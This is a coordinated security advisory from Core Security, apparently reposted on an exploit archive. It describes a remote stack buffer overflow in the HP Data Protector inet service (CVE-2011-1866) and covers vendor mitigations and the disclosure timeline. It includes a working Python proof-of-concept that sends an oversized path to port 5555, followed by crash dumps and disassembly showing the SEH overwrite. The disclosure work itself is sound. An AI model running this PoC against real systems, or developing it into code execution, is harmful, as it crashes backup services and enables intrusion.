HP Data Protector 6.20 EXEC_CMD Buffer Overflow Vulnerability

2011-06-30T00:00:00
ID 1337DAY-ID-16430
Type zdt
Reporter Core Security
Modified 2011-06-30T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                              

Core Security Technologies - Corelabs Advisory
       http://corelabs.coresecurity.com/
 
  HP Data Protector EXEC_CMD Buffer Overflow Vulnerability
 
 
1. *Advisory Information*
 
Title: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability
Advisory ID: CORE-2011-0606
Advisory URL:
http://www.coresecurity.com/content/HP-Data-Protector-EXECCMD-Vulnerability
Date published: 2011-06-29
Date of last update: 2011-06-29
Vendors contacted: HP
Release mode: Coordinated release
 
 
2. *Vulnerability Information*
 
Class: Remote stack overflow [CWE-120]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1866
 
 
3. *Vulnerability Description*
 
HP Data Protector [1] is an automated backup and recovery software for
single-server to enterprise environments. A vulnerability in HP Data
Protector could allow a remote attacker to execute arbitrary code. The
vulnerability is triggered by sending a request to port 5555 of a host
running the "data protector inet" service, part of HP Data Protector.
 
 
4. *Vulnerable packages*
 
   . HP OpenView Storage Data Protector v6.20 (running on Windows).
   . HP OpenView Storage Data Protector v6.11 (running on Windows).
   . HP OpenView Storage Data Protector v6.10 (running on Windows).
   . HP OpenView Storage Data Protector v6.00 (running on Windows).
   . Previous versions may be affected, but were not tested.
 
 
5. *Non-vulnerable packages*
 
   . No fixes are available at the time of publication.
 
 
6. *Vendor Information, Solutions and Workarounds*
 
HP has issued a security bulletin with document ID c02872182 [2]
available through HP Support Center at http://www.hp.com/go/HPSC.
 
The latest version of HP Data Protector is vulnerable to this issue. HP
has provided the following procedure to mitigate this vulnerability:
 
   1. Upgrade to Data Protector A.06.20 or subsequent.
   2. Enable encrypted control communication services on cell server and
all clients in cell.
 
 The upgrade is available for download from
http://hp.com/go/dataprotector then under 'Product Information' click on
'Trials and Demos'.
 
 
7. *Credits*
 
This vulnerability was discovered and researched by Nahuel C. Riva from
Core Security Technologies. Publication was coordinated by Carlos Sarraute.
 
 
8. *Technical Description / Proof of Concept Code*
 
The following python script can be used to reproduce the bug.
 
/-----
import sys
import socket
 
from struct import pack
 
ip = sys.argv[1]
port = int(sys.argv[2]) # default tcp port 5555
 
target = (ip, port)
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target)
 
path = 'A' * 5000
 
packet =  pack('<L', 0x20003220)
packet += pack('<L', 0x00302000)
packet += '\x20'
packet += pack('>H', 0x0020)
packet += pack('<L', 0x00432000)
packet += pack('<L', 0x00303220)
packet += '\x20'
packet += 'omnicheck.exe'
packet += pack('>H', 0x0020)
packet += pack('>H', 0x0020) * 4
packet += pack('<L', 0x30200030)
packet += pack('>H', 0x0020)
packet += path
packet += pack('>H', 0x0000)
 
plen = pack('>L', len(packet))
 
s.send(plen + packet)
 
- -----/
 By executing this script, the omniinet.exe process crashes in the
following EIP:
 
/-----
7C8285D3    8B0424           MOV EAX,DWORD PTR SS:[ESP]
7C8285D6    8BE5             MOV ESP,EBP
7C8285D8    5D               POP EBP
7C8285D9    C3               RETN
         
- -----/
 This is part of a function inside the ntdll.dll library, however, if we
look the SEH chain, we can see that the SEH handler was overwritten with
the value 0x00410041 (the unicode value for "AA"):
 
/-----
SEH chain of thread 00000578
Address    SE handler
009AFF94   omniinet.00410041
00410041   A3004472
         
- -----/
 The following are the values of the CPU registers at the time of the
crash:
 
/-----
EAX C0000008
ECX 009AEC98
EDX 7C82859C ntdll.KiRaiseUserExceptionDispatcher
EBX 0015B480
ESP 009AEC44
EBP 009AEC94
ESI 00155A80
EDI 00000000
EIP 7C8285D3 ntdll.7C8285D3
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDB000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00000206 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 0.7610000000000000098
ST7 empty 1.0000000000000000000
               3 2 1 0      E S P U O Z D I
FST 4020  Cond 1 0 0 0  Err 0 0 1 0 0 0 0 0  (EQ)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
         
- -----/
 The problem is in the 0041D170 function. This function does a blind
copy of the string passed in the packet as a path:
 
/-----
0041D170     /$ 55             PUSH EBP
0041D171     |. 8BEC           MOV EBP,ESP
0041D173     |. 51             PUSH ECX
0041D174     |. 8B45 08        MOV EAX,DWORD PTR SS:[EBP+8]
0041D177     |. 8945 FC        MOV DWORD PTR SS:[EBP-4],EAX
0041D17A     |. 8B4D 08        MOV ECX,DWORD PTR SS:[EBP+8]
0041D17D     |. 0FB711         MOVZX EDX,WORD PTR DS:[ECX]
0041D180     |. 85D2           TEST EDX,EDX
0041D182     |. 74 73          JE SHORT omniinet.0041D1F7
[...]
0041D1F7     |> 8B45 0C        /MOV EAX,DWORD PTR SS:[EBP+C]
0041D1FA     |. 0FB708         |MOVZX ECX,WORD PTR DS:[EAX]
0041D1FD     |. 85C9           |TEST ECX,ECX
0041D1FF     |. 74 26          |JE SHORT omniinet.0041D227
0041D201     |. 8B55 08        |MOV EDX,DWORD PTR SS:[EBP+8]
0041D204     |. 8955 FC        |MOV DWORD PTR SS:[EBP-4],EDX
0041D207     |. 8B45 08        |MOV EAX,DWORD PTR SS:[EBP+8]
0041D20A     |. 8B4D 0C        |MOV ECX,DWORD PTR SS:[EBP+C]
0041D20D     |. 66:8B11        |MOV DX,WORD PTR DS:[ECX]
0041D210     |. 66:8910        |MOV WORD PTR DS:[EAX],DX // copy WORDs
to the stack
0041D213     |. 8B45 08        |MOV EAX,DWORD PTR SS:[EBP+8]
0041D216     |. 83C0 02        |ADD EAX,2
0041D219     |. 8945 08        |MOV DWORD PTR SS:[EBP+8],EAX
0041D21C     |. 8B4D 0C        |MOV ECX,DWORD PTR SS:[EBP+C]
0041D21F     |. 83C1 02        |ADD ECX,2
0041D222     |. 894D 0C        |MOV DWORD PTR SS:[EBP+C],ECX
0041D225     |.^EB D0          \JMP SHORT omniinet.0041D1F7
0041D227     |> 8B55 08        MOV EDX,DWORD PTR SS:[EBP+8]
0041D22A     |. 66:C702 0000   MOV WORD PTR DS:[EDX],0
0041D22F     |. 8B45 FC        MOV EAX,DWORD PTR SS:[EBP-4]
0041D232     |. 8BE5           MOV ESP,EBP
0041D234     |. 5D             POP EBP
0041D235     \. C3             RETN
         
- -----/
 
 
 
9. *Report Timeline*
 
. 2011-06-06:
Core Security Technologies notifies the HP team of the vulnerabilities
and provides the technical details. Publication date is temporarily set
to July 5th, 2011.
 
. 2011-06-06:
Vendor confirms that a new case was assigned within HP Software Security
Response Team (SSRT).
 
. 2011-06-16:
Core requests an update on this issue, in particular Core asks the
vendor for a technical analysis of the bugs, a list of affected products
and versions, and the vendor's plan for providing a fix (no reply
received).
 
. 2011-06-23:
Core requests once more an update.
 
. 2011-06-28:
Vendor communicates that a security bulletin will be issued on the same
day (June 28). The vendor confirms the vulnerabilities, and recommends
as mitigation to enable encrypted communications in the cell server and
client.
 
. 2011-06-28:
Core requests a link to the vendor's bulletin, and asks whether CVE ids
have been assigned.
 
. 2011-06-28:
Vendor provides a link to the bulletin and CVE names for the
vulnerabilities.
 
. 2011-06-29:
Advisory CORE-2011-0606 is published.
 
 
 
10. *References*
 
[1] HP Data Protector http://hp.com/go/dataprotector
[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,
Remote Execution of Arbitrary Code
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182
 


#  0day.today [2016-04-19]  #